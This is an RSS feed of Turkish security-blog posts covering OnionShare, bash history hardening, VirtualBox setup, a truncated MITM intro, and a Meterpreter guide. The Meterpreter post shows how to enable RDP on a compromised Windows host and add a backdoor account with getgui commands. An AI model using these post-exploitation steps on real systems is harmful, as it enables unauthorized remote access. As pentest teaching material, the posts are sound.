Mert Gücü, Yazar: CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Thu, 19 Apr 2018 19:46:42 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png Mert Gücü, Yazar: CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | Onion Share https://canyoupwn.me/tr-onionshare/ https://canyoupwn.me/tr-onionshare/#respond Wed, 28 Sep 2016 06:30:43 +0000 https://canyoupwn.me/?p=4344 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

    Bildiğiniz üzere son zamanlarda Darknet diye tabir edilen “internetin karanlık yüzü” insanlar ve topluluklar tarafından oldukça merak konusuydu. Darknette veri akışı ve paylaşımların ne şekilde yapıldığı, .onion sitelerin nasıl oluşturulduğu ve yayın yaptığı, bu sitelere nasıl erişim sağlanacağı gibi konuların araştırmaları yapılması son zamanlarda epey bir sıklaştı. Bizde canyoupwn.me ekibi olarak anonimlik konularını […]

TR | Onion Share Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

    Bildiğiniz üzere son zamanlarda Darknet diye tabir edilen “internetin karanlık yüzü” insanlar ve topluluklar tarafından oldukça merak konusuydu. Darknette veri akışı ve paylaşımların ne şekilde yapıldığı, .onion sitelerin nasıl oluşturulduğu ve yayın yaptığı, bu sitelere nasıl erişim sağlanacağı gibi konuların araştırmaları yapılması son zamanlarda epey bir sıklaştı. Bizde canyoupwn.me ekibi olarak anonimlik konularını yavaş yavaş ele alıyoruz ve bu bağlamda yapılan işlemleri, kullanılan araçları sizlerle paylaşıyoruz. Tabi ki buradaki amaç illegal açıdan paylaşımları değil, gerekli durumlarda güvenli ve gizli veri akışı nasıl sağlanır, nedir bu dark net gerçeği bunları görmektir.

    Onionshare, güvenli ve anonim olarak dosya paylaşımı yapılmasına olanak tanıyan ve python ile geliştirilmiş güzel bir araçtır.  Arka planında tor servisini kullanan bu program ile kendi bilgisayarınızdan direk olarak dosya paylaşımı yapılabilir, istenilen durumlarda bu paylaşım durdurulabilir ve indirme yüzdelerini gözleyebilirsiniz.

 

Hangi platformlarda kullanılabilir ?

Linux, Windows, Mac OS X işletim sistemlerinde kullanılabilmektedir. Konsol ve Arayüz kullanımı olarak iki farklı seçenek sunmaktadır.

 

Nelere ihtiyaç duyar?

Tor servisinin ve tor browserının kurulu olması gerekmektedir.

sudo apt-get install tor  komutu ile tor servisi kurulabilir.

https://www.torproject.org/download/download.html.en  linkinden tor browser indirilmelidir. İndirilen dizinde en üst dizine çıkılarak ./start-tor-browser  komutu ile tor browser çalıştırılabilir.

Not: Tor servisinin kurulumu zorunlu değildir yalnızca tor browser kurulumu ve kullanılması yeterli olacaktır fakat tor servisi bir çok anonimlik konumuzda ihtiyaç duyacağımız bir servistir.

 

Nasıl kurulur ve kullanılır ?

git clone https://github.com/micahflee/onionshare.git
sudo apt-get install -y python3-flask python3-stem python3-pyqt5 python-nautilus
sudo apt-get install onionshare

komutları ile onionshare indirilip kurulur. Kurulum sonrası kullanım için bize Terminal ve GUI olmak üzere iki seçenek sunmaktadır.

Onionshare-Terminal
Linux sistemlerin terminalinde direk olarak onionshare komutu ile çalıştırmamız mümkündür.

Onionshare –h   komutu ile kullanım komutlarını görüntüleyebiliriz.

onionshare_01

filename   Paylaşılmak istenen verinin dosya yolu ve ismi

–local-only   Tor browsera ve ya tor servisine ihtiyaç duymadan sadece local ağ üzerinden paylaşım yapılmasına olanak sağlar.

–stay-open   Paylaşım yapıldıktan sonrada terminal durdurulana kadar bağlantının açık kalmasına olanak sağlar.

Önemli Not : Local paylaşımlar dışında tor browserın mutlaka açık olması gerekmektedir.

onionshare_02

onionshare –stay-open <dizin>/<dosya>  komutu ile terminal üzerinden dosya paylaşımı başlatılır ve .onion çıktısı üretilir. Bu çıktı ile dış ağdan tor network aracılığıyla ulaşım sağlanıp dosya indirilimi yapılır.

CTRL + C  komutu ile paylaşımı durdurabilirsiniz.

onionshare_03

Onionshare-GUI

Terminal ekranından onionshare-gui  veya search kısmından arayüz tarafını çalıştırmanız mümkündür.

onionshare_04

Sürükle-bırak ile ve ya Add Files/Add Folder butonları ile dosya veya klasör eklenebilir. Start Sharing butonu ile paylaşım başlayacaktır.

Stop sharing automatically seçili olduğu taktirde ilk indirme işleminden sonra otomatik olarak paylaşım işlemi duracaktır.

onionshare_05

Downloads kısmından karşı taraftan indirim yüzdesini ve eğer tek paylaşımlık değilse kaç kişinin kullandığı gözlenebilmektedir.

Not : Bu yazıda bahsedilmeyecek olsada dosya paylaşım sınırlamasının bugu bulunmaktadır.

TR | Onion Share Mert Gücü

]]>
https://canyoupwn.me/tr-onionshare/feed/ 0
TR | Linux Bash History Formatı https://canyoupwn.me/tr-linux-bash-history-formati/ https://canyoupwn.me/tr-linux-bash-history-formati/#respond Thu, 01 Sep 2016 06:00:24 +0000 https://canyoupwn.me/?p=4119 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bash Nedir ? Bash GNU işletim sistemi için bir kabuk ya da başka bir deyişle komut dili yorumlayıcısıdır. Bourne-Again SHell sözcüklerinde türetilmiş bir kısaltmadır. Unix altında, bash kabuğu diğer benzerlerine nazaran daha fazla özelliğe ve işleve sahiptir. Linux işletim sistemi için de derlenen bash ise hem tcsh, hem de ksh‘dan özellikler taşır. Linux terminali içinde […]

TR | Linux Bash History Formatı Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bash Nedir ?

Bash GNU işletim sistemi için bir kabuk ya da başka bir deyişle komut dili yorumlayıcısıdır. Bourne-Again SHell sözcüklerinde türetilmiş bir kısaltmadır. Unix altında, bash kabuğu diğer benzerlerine nazaran daha fazla özelliğe ve işleve sahiptir. Linux işletim sistemi için de derlenen bash ise hem tcsh, hem de ksh‘dan özellikler taşır.

echo_shell

Linux terminali içinde echo $SHELL yazdığımız taktirde, işletim sistemi altında default olarak çalışan shell’i(kabuğu) görebiliriz.

/bin/bash  Bu şekilde bir çıktı veriyor. Bin klasörü altında bash çalıştığını anlayabiliriz.

Bash ve bash shell scripting hakkında ayrıca araştırma yapılması faydalı olacaktır. Bu yazıda asıl konumuz olan Bash History ve bunun sıkılaştırması ve gerekli sıkılaştırma işlemleri yapılmadığı taktirde saldırganın bunu ne amaçlarla kullanabileceğini üzerinde duracağız.

Bash History

Bash history /home/user ( ~ ) dizini altında bulunan ve gizli klasör olan .bash_history dosyasının içerisine kaydolmaktadır.

ls-la

cat .bash_history  komutu ile geçmişte yazılmış olan bash komutlarını okumak mümkün iken, bash ekranında direk olarak history  komutuda kaydedilmiş komutları vermektedir.

echo $HISTSIZE  komutu ile ekrana kaç adet geçmiş komut bastırabildiğimizi görebilir ve istersek bunu değiştirebiliriz.

BASH HISTORY KOMUTLARI

  • echo $BASH : Kullanılan kabuk ve dosya yolu.
  • echo $HISTSIZE : .bash_history dosyasının kaç kayıt tuttuğunun çıktısını verir.
  • history | tail : Son 10 komutu listeler.
  • history | more : Birden başlayarak listeler.
  • history n  : “n” değeri yerine yazılan sayı kadar sondan başlayarak komut listeler.
  • CTRL + R : İstediğimiz komutu aramak için arama ekranı açar.
  • history | grep value : “value” değeri yerine girdiğiniz değeri history içerisinde arayıp, değerin gectiği bütün geçmiş komutları getirir.
  • !10 : 10. komutu çalıştırır.
  • !! : Son çalıştırılan komutu tekrar çalıştırır.
  • history -c : Historyi temizler. Burada önemli bir ayrıntı vardır. history -c  komutu shell ekranında history  yazdığınızda gelen çıktıları temizler. Dolayısıyla geçmiş komutlar .bash_history  dosyası altında tutulmaya devam eder.

 

BASH HİSTORYSIZE DEĞİŞTİRİLMESİ

echo $HISTSIZE  komutu ile bash listesinde tutulan toplam komut sayısını öğrenildiğinden bahsetmiştik. Bu komut home/user (~)  dizini altında bulunan .bashrc  dosyası altında bulunmaktadır. Dolayısıyla bu dosyaya girerek değişiklik yapmamız mümkündür.

BASH HISTORYNİN YARARLARI VE ZARARLARI

Bir tehdit açısından ele aldığımızda bash historysinin bazı yararları ve zararları bulunmaktadır.

Avantajları ve Sıkılaştırması

Olası saldırı durumlarında, öncesinde ve sonrasında saldırganın sisteminizdeki izini sürmenize yardımcı olur. Hangi dizinleri erişim sağlanmış, veri kaybı olmuş mu, hangi izinler değiştirilmiş gibi bir çok etkenden haberdar olmuş oluyorsunuz. Özellikle (“Bu komutları ben girmedim”) dediğiniz komutlar mevcut ise sisteminizde bir ziyaretçi bulunuyor olabilir.

Tabi bu yararlardan verimli faydalanabilmek için bazı önlemler alınması gerekmektedir.

ls,la,profile

chattr +a /home/user/.bash_history 
chattr +a /home/user/.bash_profile 
chattr +a /home/user/.bash_login 
chattr +a /home/user/.profile 
chattr +a /home/user/.bash_logout 
chattr +a /home/user/.bashrc

chatter +a  komutu ile sadece ekleme yapılabilir özelliğini veriyoruz. Böylelikle root kullanıcısı dışında her hangi bir silme düzenleme işlemi yapılamaz hale gelecektir.

Dezavantajları

Bash History bütün komutları sakladığı için plain-text şifreler, önemli gizli dosyalar gibi bir çok dosyada listelenecektir.


TR | Linux Bash History Formatı Mert Gücü

]]>
https://canyoupwn.me/tr-linux-bash-history-formati/feed/ 0
TR | VirtualBox Nasıl Kurulur ve Kullanılır? https://canyoupwn.me/tr-virtualbox-nasil-kurulur-kullanilir/ https://canyoupwn.me/tr-virtualbox-nasil-kurulur-kullanilir/#respond Sat, 18 Jun 2016 22:14:44 +0000 https://canyoupwn.me/?p=2790 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Sanal Makine(Virtual Machine) nedir? Bilgisayar biliminde, Sanal makine programları gerçek bir bilgisayar sistemindeki gibi çalıştıran mekanizmaların yazılım uyarlamasıdır. Sanal Makine, işletim sistemi ile bilgisayar platformu arasında bir sanal ortam yaratır ve bu sanal ortam üzerinde yazılımların çalıştırabilmesine olanak sağlar. (Vikipedi) Peki neden sanal makina tercih etmeliyiz?  Sanal makinalerde yapacağımız testler sonucu oluşabilecek hasarlar gerçek işletim […]

TR | VirtualBox Nasıl Kurulur ve Kullanılır? Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Sanal Makine(Virtual Machine) nedir?

Bilgisayar biliminde, Sanal makine programları gerçek bir bilgisayar sistemindeki gibi çalıştıran mekanizmaların yazılım uyarlamasıdır. Sanal Makine, işletim sistemi ile bilgisayar platformu arasında bir sanal ortam yaratır ve bu sanal ortam üzerinde yazılımların çalıştırabilmesine olanak sağlar. (Vikipedi)

Peki neden sanal makina tercih etmeliyiz?  Sanal makinalerde yapacağımız testler sonucu oluşabilecek hasarlar gerçek işletim sistemimizi etkilemez ve sanal makinamızda birazdanda değineceğim Snapshoot işlemini gerçekleştirirsek kolayca ve hızlıca eskiye dönme imkanı sunar. Bunun yanı sıra güvenlik testleri için bize etik bir ortam sağlar.

Bende bu yazımda sizlere Sanal Makina seçeneklerinden birisi olan ve tamamen ücretsiz olan VM VirtualBox’ın kurulumunu ve konfigürasyonunu ve iki makina arasındaki iletişimi anlatacağım.

VM_01

 

www.virtualbox.org/wiki/Download adresinden VirtualBox’ımızı indirebiliriz. Bize OS X, Windows, Linux, Solaris gibi işletim sistemlerinde kurulum imkanı sunmaktadır. Bu yazıda Windows üzerine kurulumunu ele alacağım. Ekranda gördüğünüz amd64, amd’nin isim hakkını almasından kaynaklıdır.

İndirdiğimiz dosyayı çalıştırdığımızda bizi yükleme ekranı karşılamaktadır.

VM_02

Next butonu ile bir sonraki adıma geçiyoruz.

VM_03

Bu bölümde VM ile birlikte kurulacak eklentiler ve kurulumun gerçekleşeceği path gözükmektedir. Dilersek bunlar üzerinde değişiklik yapabiliriz. Default olarak kalması önerilir.

VM_04

Install butonu ile kurulumu başlatabiliriz.

VM_07

Kurulum esnasında bizden kurulum için ihtiyaç duyduğu bazı eklentileri kurmak için izin isteyecektir. Yükle butonu ile bunları yüklemeliyiz.

VM_08

Kurulum tamamlamıştır. Start Oracle VM VirtualBox 5.0.20 after installation box’ını seçtiğimiz taktirde VM’i otomatik olarak başlatacaktır.

VM_09

VirtualBox’ın kurulum ve kullanım ekranı yukarıda görüldüğü gibidir. Şimdi detaylı şekilde her bölümü ele alalım.

File butonu altındaki seçeneklerimizi gözden geçirelim.

VM_10_0

Preferences.. butonuna tıkladığımızda bizi genel ayarlamaları yapabileceğimiz ve VM üzerindeki bütün başlangıç ayarlarını etkileyecek ayar ekranı gelmektedir.

 

General sekmesinde kurulacak olan sanal makinenin dosyalarının hangi dizin altında saklanacağını ayarlayabiliriz.

VM_10

Input sekmesinde VM üzerinde kullanabileceğimiz kısayol tuşları yer almaktadır. Dilersek bu tuşları kendi tercihimize göre ayarlayabiliriz.

VM_11

Update sekmesinden VM’i update edebiliriz.

Langueage sekmesinde VM’in dil ayarlarını değiştirme olanağımız vardır. Burada dikkat edilmesi gereken bir husus, bu dil ayarının VirtualBox’ın içine kurduğumuz sanal makinaların değilde VirtualBox’ın şu an ki mevcut arayüzünün dil ayarları olduğudur.

VM_13

Display sekmesinde VM arayüzümüzün ekran ayarlarını ayarlayabiliriz.

VM_14

Network bu menüler arasında bizi ilgilendirebilecek en önemli menüdür. Bu menüde kurulacak sanal makinenin NAT ve ya Ağ bağdaştırıcı ayarlarını ayarlayabiliriz. Biz DHCP ile IP ağacı atadığımızda bizim girdiğimiz değerler üzerinden atama yapacaktır. Bu bölümde en düşük ve en yüksek IP aralığını berlileyip, IP dağıtımını buna göre yapabiliriz.

VM_15

Proxy menüsünde proxy ayarlarını yapıp bu ayarlar dahilinde erişim sağlama olanağımız var.

VM_16

File menüsü altındaki bir sonraki butonumuzu inceleyelim.

VM_17_01

Import Appliance.. butonun tıkladığımızda daha önceden kurulmuş ve imajı alınmış bir sistemi Virtual Machine içine dahil etmemize yarar. Bir sonraki adımda göstereceğim imaj alma işlemi sonucu (.ova, .ovf) uzantılı bir sanal makine imajı oluşur. Kevgir bunlara örnektir ve bu yazımdada örnek olarak Kevgiri kullandım.

VM_92

Klasör butonuna tıkladığımızda bizden imajımı seçmemizi isteyecektir.

VM_91

İmajımızı seçtiğimizde VM içine sistemi import edecektir.

Bir diğer seçenekte imajın üzerine çift tıklamaktır. Bu şekilde de imajı VM içerisine import edecektir.

VM_36

VM_37

Daha önceden elimizde olan bir imajı VM içerisine kurmayı öğrendik. Peki biz nasıl VM içerinde kurulan bir sistemin imajını alabiliriz?

Burada devreye yine File menüsü altında bulunan Export Appliance.. butonu devreye giriyor.

VM_18_01

Tıkladığımızda bize VM üzerinde kurulu sanal makinelerin listesini getirecektir. İmajını almak istediğimiz makineyi seçiyoruz ve Next butona basıyoruz.

VM_93

İmajın yazdırılacağı path’i belirtiyoruz.

VM_94

Son olarak isim veya girmek isediğimiz bilgiler varsa bunları yazıyoruz ve Export butonuna basıyoruz.

VM_95

File menüsü altında bulunan ve anlatımımızda son olarak yer alan bir başka menüde Virtual Media Manager butonudur.

VM_18_02

Bu menü ile VM üzerindeki sistemlerin disk boyunu gözlemleyebilir ve üstünde değişiklikler yapabiliriz.

VM_18

VirtualBox arayüzündeki genel işlevi öğrendiğimize göre artık bir sanal sistem kurabiliriz. VirtualBox arayüzünde bulunan New butonuna basıyoruz.

VM_19_01

Karşımıza gelen ekranda Sanal Makinamızın ismini, işletim sistemi türünü ve sistemin türünü seçiyoruz. Burada doğru versiyon ve işletim sistemini seçmek 3rd Part kurulumlar için önemlidir.

VM_19

Bir sonraki adımda sistemin kullanacağı RAM boyutunu belirliyoruz. Açılacak sanal makine sayısı ve kendi yerel işletim sisteminizin gereksinimlerine göre ayarlamak son derece önemlidir.VM_20

Bir sonraki adımda Hard Disk ayarlarını yapıyoruz. Burada üç seçenek karşımızı gelmektedir.

En üstteki seçenek bir hard disk tanımlamayacağımızı belirten seçenektir. Ortadaki seçenek bir adet sanal disk oluşturacağımızı belirtir. Bu sanal disk bizim gerçek sistemimizdeki depo alanından kullanacaktır. Biz bu seçeneği seçeceğiz. En alttaki seçenek ise harici bir disk tanımlamamıza olanak sağlar. Fiziksel bir diskimiz var ise ve bunun bağlantısını yaparsak depo olarak onu kullanmamıza olanak sağlar.

VM_21

Bir sonraki adımda diskimizin dinamik bir boyutta mı yoksa sabit bir boyuttamı olacağının kararını vereceğimiz adımdır. Buradaki fark, sabit boyutu seçersek ilerleyen zamanlarda disk boyunta her hangi bir genişletme işlemi yapamayız. Fakat dinamik boyunu seçersek diskimiz bittikçe kendini genişletecektir ve ya kendimiz disk boyutunu genişletebiliriz. Biz bu anlatımımızda dinamik boyunu seçeceğiz.

VM_23

Sonraki adımda Sanal Makinamıza vereceğimiz disk boyutunu belirliyoruz. Kurulumlar için minimum 20 GB öneririm fakat bu boyut sadece kurulum için yeterli olacaktır.

VM_24

Create butonu ile sanal makinamızın taslağını oluşturduk. Fakat içerisine henüz bir kurulum dosyası atamadık. Birde sanal makinanın genel içerik ayarlarını adım adım inceleyelim.

Sanal makinamızın üzerine tıklıyoruz ve VirtualBox arayüz ekranında Setting butonuna basıp ayarlar menüsüne giriyoruz.

VM_96

Karşımıza tekrar General menüsü gelmektedir. Bu menüde karşımıza daha öncesinde belirttiğimiz sistemimizin adı, versiyonu ve işletim sistemi gelmektedir.

VM_26

Bir yan sekmesi olan Advance menüsünde Snapshots aldığımızda bu snap’in hangi dosyaya kaydolacağının path’ini ayarlayabiliriz.

VM_27

System menüsünde daha öncesinden belirlediğimiz RAM boyutunu tekrardan ayarlayabiliriz. Burda dikkat etmemiz gereken husus bu ayarlamaları yaptığımız sırada ilgili makinamızın kapalı olmasıdır.

Boot Order menüsünden açılış sırasında öncelikli olarak nelerin çalıştırılacağını ayarlayabiliriz.

VM_28

Yan sekmesi olan Processor menüsünden kullanılacak olan CPU adedini ve performas yüzdesini ayarlayabiliriz.

VM_29

Display menüsü daha önce Preferences menüsünde gördüğümüz display seçeneğinden farklıdır. Buradaki Display seçeneği tamamiyle üzerinde ayar yaptığımız sistemimizi etkilemektedir. Video Memory seçeneği ile ekran kartı boyutunu seçebiliriz. Kullanılacak ekran miktarını ve 2D, 3D gibi kolerasyon ayarlarını yapabiliriz.

VM_30

Buraya kadar herşeyi yaptık fakat henüz bir işletim sistemi kurulumu için bir kurulum cd’si(iso) belirtmedik.

VM_31

Kırımızı kutu içerisindeki CD resmine basıyoruz ve kurulumuna yapacağımız işletim sisteminin iso dosyasını seçiyoruz. Eğer bunun seçimini yapmaz isek ve sanal makinamızı çalıştırırsak aşağıdaki gibi bir hata ile karşılaşabiliriz.

VM_97

Eğer böyle bir hata alıyorsak ilk aklımıza gelmesi gereken şey kurulum için bir iso dosyası tanımlamadığımız olmalıdır.

Bir sonraki menümüz Audio menüsüdür. Bu menüde Sanal Makina üzerindeki ses cihazı tanımalarını yapabiliriz.

VM_32

Network menüsü en çok kullanacağımız menülerden birisidir. Bize bir çok network seçeneği sunar. Sanal Makinalarda yaptığımız testlerde bu ayarlamalar oldukça önem taşır. Tek tek hepsini ele alacak olursak,

VM_33

NAT: VM kendi içerisinde bir ağ (sanal switch) oluşturur ve bu sanal switch üzerinden modeme erişim sağlar. Bu işlem sırasında NAT networka bağlı cihazlar kendi IP bloklarından IP değeri alırlar. Sistemde NAT seçili olduğu taktirde NAT ağda olmayan diğer sanal makinalarla ve ana makinayla iletişim sağlayamazlar. Aynı zamanda NAT ağa bağlı bir sanal makina internete bağlı durumda ise dış networka çıkış yapabilir.

VM_38

ifconfig komutu ile IP adresini incelediğimizde 10.0.2.15 IP adresini aldığımızı göreceğiz. Oysaki ana işletim sistemimiz 192.168.0.13 IP adresine sahip. Sanal Makinamızı pinglemeye çalıştığımızda başarılı olamadığımızı göreceğiz.

1__bash_and_Virtual_Machine_Library

Sanal Makinamız üzerinden dış network olan Google pinglediğimizde başarıyla dış networka çıktığımızı gözlemliyoruz.

Dikkat etmemiz gereken bir konu ise, iki farklı bilgisayarda ve ya iki farklı Virtual Machine’de çalıştırılan (Örn VirtualBox ve Vmware) ve NAT ağına alınmış iki sistem birbiriyle iletişim kuramazlar.

VM_99

Bridge Adapter: Bridge adapther ile köprü bir bağ kurmuş oluruz. Yani asıl bilgisayarımızın ağına dahil olmuş oluruz ve 192.168.0.* üzerinden bir IP değeri alırız. Buda sanal makinamızdan, asıl makinamızı pingleyebileceğimiz yani iletişim kurabileceğimiz anlamına gelir. Bunun yanı sıra dış ağada bağlanabiliriz.

Bir diğer bilmemiz gereken şey  NAT’ın aksine Bridge Networka ayarlanmış bir VM, başka bilgisayarlardaki VM’lerle yada gerçek sistemlerle iletşim kurabildiğidir. Bunun sebebide direk olarak Modemin arayüzüne bağlanmasıdır.

Alttaki resimde görüldüğü üzere A bilgisayarımda açık olan Linux işletim sistemimin IP adresi 192.168.0.15’tir.

VM_02

A bilgisayarımda açtığım sanal makina üzerinde açık olan Windows XP işletim sistemimin IP adresi ise 192.168.0.18’dir.

VM_01

Linux sistemden, Windows sistemi pinglediğim zaman paket gönderebildiğimi yani iletişim kurabildiğimi gözlemleyeceksiniz

VM_03

B bilgisayarımdan ise A bilgisayarımdaki Windows sistemi pinglediğimde yine paket gönderebildiğimi yani iletişim kurabildiğimi görüyorsunuz.

2

Host Only Adapter : Host only adapter seçeneği ise özel bir ağ gibi davranır. NAT Networktan farkı ise aynı ağda olduğu sürece fiziksel makinalarlada iletişime geçebileceği ve dış ağa bağlanamayacağıdır. Örnek olarak proxyi ayarı yapılarak farklı bir networka taşınabilir ve bu network içerisindeki diğer fiziksel cihazarla iletişim kurabilir.

 

USB menüsünde ise sanal makinamız için USB cihazlar tanımlamamıza yarayan menüdür.

VM_34

 

Shared Folder menüsünde fiziksel makinamız ve ya içinde bulunduğumuz ağ için ortak paylaşım klasörü oluşturmamıza olanak sağlayan menüdür.

VM_35

Bütün bu ayarları yaptığımıza göre artık sanal makinamızı çalıştırabiliriz.

Start butona bastığımızda sanal makinamız kendini açacaktır.

VM_38

Son olarak önereceğim bir diğer husus makinazı kurduktan sonra Snapshot almanızdır. Böylelikle testlerde yada normal kullanım zamanlarınızda olası çökmelere ve arızalara önlem almış olursunuz. Hızlı ve kolay şekilde geri yükleme imkanı sunar ve snap aldığınız zamandaki verilerinizi saklamış olursunuz.

Snap almak için Virtual Machine arayüzündeki Snapshots butonuna tıklıyoruz ve kırmızı kare içerisinde görünen küçük fotoğraf makinası butonuna tıklıyoruz. Aynı zamanda Ctrl + Shift + S kısa yolu ilede snap almamız mümkündür.

VM_39

VM_40

Snapshotımızı oluşturduk.

VM_41

Peki sistemimiz bozulduğunda snap’i nasıl etkinleştirebilirim? Gayet basit. Yukarıdaki ekranda Snapshot 1 (Bu bizim verdiğimiz isim) tıkladığımızda 3 adet buton aktif hale gelecektir.

VM_42

Kırmızı kutu ile seçili olan buton sistemimizi eski haline getirecektir. Ortadaki buton daha önce aldığımıs Snapshotları silmemize olanak sağlar ve onun sağındaki buton ise makina ve snap hakkında detaylara ulaşmamıza olanak sağlar. Son olarak koyun simgeli buton ise makinamızın klonunu alıp kendi bu sistemin bu şekilde kalmasına olanak sağlar.

Yazımı bitirmeden VirtualBox’ın bir güzel özelliğinden bahsetmek istiyorum. VirtualBox’ın ara yüzü diğer diğer işletim sistemlerindede aynıdır dolayısıyla kullanımı kolaydır. Bir sonraki konum olan Vmwarede göreceğimiz bir konu, farklı işletim sistemleri ve farklı versiyonlarda farklı ara yüze sahip olması Vmware biraz daha karmaşık hale getirmektedir.

Bir sonraki yazımda görüşme dileğiyle..

 

 

 

 

TR | VirtualBox Nasıl Kurulur ve Kullanılır? Mert Gücü

]]>
https://canyoupwn.me/tr-virtualbox-nasil-kurulur-kullanilir/feed/ 0
TR | Meterpreter ile RDP (Remote Desktop Protocol) Bağlantı Kurmak https://canyoupwn.me/tr-meterpreter-ile-rdp-remote-desktop-protocol-baglati-kurmak/ https://canyoupwn.me/tr-meterpreter-ile-rdp-remote-desktop-protocol-baglati-kurmak/#comments Mon, 16 May 2016 09:14:41 +0000 https://canyoupwn.me/?p=1994 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bu yazımda ele geçirilmiş bir sistemde, kali ve ya metasploit kurulu her hangi bir linux dağıtımı üzerinden nasıl RDP (Remote Desktop Protocol) bağlantı sağlanabileceğini anlatacağım.  Ben örnekte Psexec ile sisteme giriş yaptım. Aynı zamanda netapi gibi bir çok yöntemlede erişim sağlayabilirsiniz. Bazı sistemlerde Uzak Masaüstü Erişimi özellikle kapatılmış ve ya default olarak kapalı gelebilir. Resimde görüldüğü üzere […]

TR | Meterpreter ile RDP (Remote Desktop Protocol) Bağlantı Kurmak Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bu yazımda ele geçirilmiş bir sistemde, kali ve ya metasploit kurulu her hangi bir linux dağıtımı üzerinden nasıl RDP (Remote Desktop Protocol) bağlantı sağlanabileceğini anlatacağım.  Ben örnekte Psexec ile sisteme giriş yaptım. Aynı zamanda netapi gibi bir çok yöntemlede erişim sağlayabilirsiniz.

Bazı sistemlerde Uzak Masaüstü Erişimi özellikle kapatılmış ve ya default olarak kapalı gelebilir.

Screenshot_1

Resimde görüldüğü üzere sızdığımız sistemde Remote Desktop özelliği kapalı. RDP seçeneğini aktive etmek için regeditte işlem yapan ve meterpreter’ın içinde bulunan getgui scriptinden faydalanabiliriz.

Öncelikle meterpreter ekranında run getgui –h yazalım ve seçeneklerimizi görüntüleyelim.

rdp_08

 

Görüldüğü üzere RDP bağlantığımızı etkinleştirmek için öncelikle run getgui –e komutunu çalıştırmalıyız.

Screenshot_3

Yukarıda da görüldüğü gibi RDP is disabled, enabling it… çıktısını verdi ve RDP’nin öncesinde kapalı olduğunu, şimdi ise açıldığını yazdı.

Screenshot_2

Komuttan sonra hedef sistemimizi tekrar incelediğimizde Uzaktan Masaüstü Bağlantısı(RDP) izninin aktive edilmiş olduğunu göreceğiz.

RDP bağlantımızı etkinleştirdikten sonra yapmamız gereken işlem run getgui –u <kullanıcı adı> -p <parola> komutu ile bir kullanıcı adı ve parola belirlemek ve kullanıcı oluşturmak.

rdp_04

run getgui –u testuser –p testpass komutu ile RDP bağlantısı için bir kullanıcı oluşturduk. Buradaki önemli bir diğer konu eğer RDP yetkisine sahip (admin gibi) bir kullanıcı bilgilerine sahipseniz buradaki aşamayı geçebilir ve direk o kullanıcının kullanıcı adı ve şifresiyle bağlanabilirsiniz. Mevcut kullanıcı ile giriş yapmak loglama açısından daha verimli olacaktır.

 

Ben bu yazımda kullanıcı adı ve parola bilmediğimi baz alaraktan yeni bir kullanıcı oluşturdum ve o kullanıcı bilgileri ile giriş yapacağım. Bunun için yeni bir konsol ekranında (meterpreter ekranında yazmamanız önemli) rdesktop <hedef-ip> -u <k.adı> -p <password> komutu ile hedef bilgisayara RDP bağlantısı açıyoruz.

Mevcut sistemde rdesktop çalışmıyorsa, paketleriniz eksik yada kurulu olmayabilir. Bu sorunu gidermek için komut satırına apt-get install xrdp yazarak rdesktop kurulumunu yapmanız gerekecektir.

rdp_05

 

rdp_06

Görüldüğü gibi RDP bağlantımız açıldı ve bizden oluşturduğumuz kullanıcı adı ve parolayı istiyor. Bu kullanıcı adı ve parolayı girdiğimizde hedef bilgisayarın masaüstüne uzaktan bağlantı kurmuş olacağız.

rdp_07

Yazımı bitirmeden önce belirtmek istediğim bir nokta, bu işlemlerin çokça iz ve log bırakacağıdır. Özellikle blackbox testlerde buna özen gösterilmesi gerekmektedir. Bir sonraki yazıda görüşmek dileğiyle.

TR | Meterpreter ile RDP (Remote Desktop Protocol) Bağlantı Kurmak Mert Gücü

]]>
https://canyoupwn.me/tr-meterpreter-ile-rdp-remote-desktop-protocol-baglati-kurmak/feed/ 1
TR | MITM Teorisi https://canyoupwn.me/tr-mitm-teorisi/ https://canyoupwn.me/tr-mitm-teorisi/#respond Fri, 29 Apr 2016 22:00:36 +0000 https://canyoupwn.me/?p=988 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Nedir bu MITM (Man In The Middle)? Bunu açıklamadan önce yüzeysel olarak ağda bilgisayarların haberleşme şekillerinden bahsetmekte fayda var. Birden fazla bilgisayarın tek bir ağda birbirleriyle haberleşebilmeleri için bu bilgisayarları ağa dahil eden Hub ve Switchler mevcuttur. Hublar OSI modelinin ilk katmanı olan fiziksel katmanda çalışan ve gelen veride hiç bir kontrol işlemi uygulamadan kendi portlarına […]

TR | MITM Teorisi Mert Gücü

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Nedir bu MITM (Man In The Middle)?
Bunu açıklamadan önce yüzeysel olarak ağda bilgisayarların haberleşme şekillerinden bahsetmekte fayda var.
Birden fazla bilgisayarın tek bir ağda birbirleriyle haberleşebilmeleri için bu bilgisayarları ağa dahil eden Hub ve
Switchler mevcuttur.

Hublar OSI modelinin ilk katmanı olan fiziksel katmanda çalışan ve gelen veride hiç bir kontrol işlemi uygulamadan kendi portlarına bağlı tüm sistemlere yollayan bir modeldir. Alıcı bilgisayar, veri kendisine gelmiş ise veriyi kabul eder,  eğer gelmemiş ise göz ardı eder. Böylelikle aslında ağ üzerinden geçen bütün paketlerin takibi
mümkün kılınmaktadır.

